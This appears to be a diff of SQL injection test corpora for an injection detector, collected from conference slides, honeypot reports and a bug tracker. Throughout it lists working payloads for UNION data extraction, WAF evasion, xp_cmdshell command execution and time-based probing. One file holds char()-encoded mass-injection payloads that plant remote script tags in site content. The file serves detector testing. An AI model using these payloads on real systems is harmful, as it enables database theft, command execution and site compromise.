%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
1%27+and+0x31%3D%271+
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+
# skipping
#SELECT+1%2C2%2C0xEF%60
#SELECT+1%2C2%2C3%60abc%60%60
1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27

View file

@ -0,0 +1,151 @@
#
# from
# Roberto Salgado
# SQLi Optimization and Obfuscation Techniques
# Black Hat USA 2013
#
#
# Slide 47 - Optimizing Queries MSSQL
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')
#
# Slide 48 - Optimizing Queries Oracle
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables
#
# Slide 49 - Optimizing Queries PSQL
# (note: slightly reworked to put in SQLi format)
#
1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
#
# Slide 50 - Optimizing Queries MSSQL
#
IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
#
# Slide 54 - Optimizing Queries - More Single Liners
# (
1 OR 1#"OR"'OR''='"="'OR''='
#
# Slide 55
#
1 OR 1#"OR"'OR''='"="'OR''='
#
# Slide 61
#
1!=0--+"!="'!='
#
# Slide 64 How to confuse an Admin
#
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
#
# Slide 74 (MySQL Obfuscation)
#
1.UNION SELECT 2
3.2UNION SELECT 2
1e0UNION SELECT 2
SELECT\N/0.e3UNION SELECT 2
1e1AND-0.0UNION SELECT 2
1/*!12345UNION/*!31337SELECT/*!table_name*/
{ts 1}UNION SELECT.`` 1.e.table_name
SELECT $.`` 1.e.table_name
SELECT{_ .``1.e.table_name}
SELECT LightOS . ``1.e.table_name LightOS)
SELECT information_schema 1337.e.tables 13.37e.table_name
SELECT 1 from information_schema 9.e.table_name
#
# Slide 75 (MSSQL Obfuscation)
#
.1UNION SELECT 2
1.UNION SELECT.2alias
1e0UNION SELECT 2
1e1AND-1=0.0UNION SELECT 2
SELECT 0xUNION SELECT 2
SELECT\UNION SELECT 2
\1UNION SELECT 2
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[information_schema].[tables]
#
# Slide 76 (Oracle Obfuscation)
#
1FUNION SELECT 2
1DUNION SELECT 2
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
SELECT%00table_name%00FROM%00all_tab_tables
#
# Slide 77 (Bypassing Firewalls, General Tips)
#
1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
#
# Slide 78 (Modsecurity)
#
-2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1
#
# Slide 79 (Modsecurity)
#
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES
#
# Slide 80 (Fortinet)
# (Skipped since specific to Fortinet)
#S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2
#
# Slide 81 (GreenSQL)
#
-1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =C,1,2)
#
# Slide 83 (libinjection)
#
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
# note changed "FROM table" to "FROM table_name"
# and "column" to "column_name"
-1fUNION SELECT column_name FROM table_name
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1
#
# Slide 84 (libinjection)
#
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
1 mod /*!1*/ union select table_name from information_schema.tables--
true is not unknown for update union select table_name from information_schema.tables
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
-1 union select @``"", table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
$.``.id and 0 union select table_name from information_schema.tables
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
-1.for update union select table_name from information_schema.tables limit 1
-0b01 union select table_name from information_schema.tables limit 1
1<binary 1>2 union select table_name from information_schema.tables limit 1
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1

File diff suppressed because one or more lines are too long

View file

@ -0,0 +1,24 @@
#
# http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html
#
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users--
35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--

View file

@ -0,0 +1,12 @@
#
# http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
#
21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,100 @@
# https://github.com/client9/libinjection/issues/109
#
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL)
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi)
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets)
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf
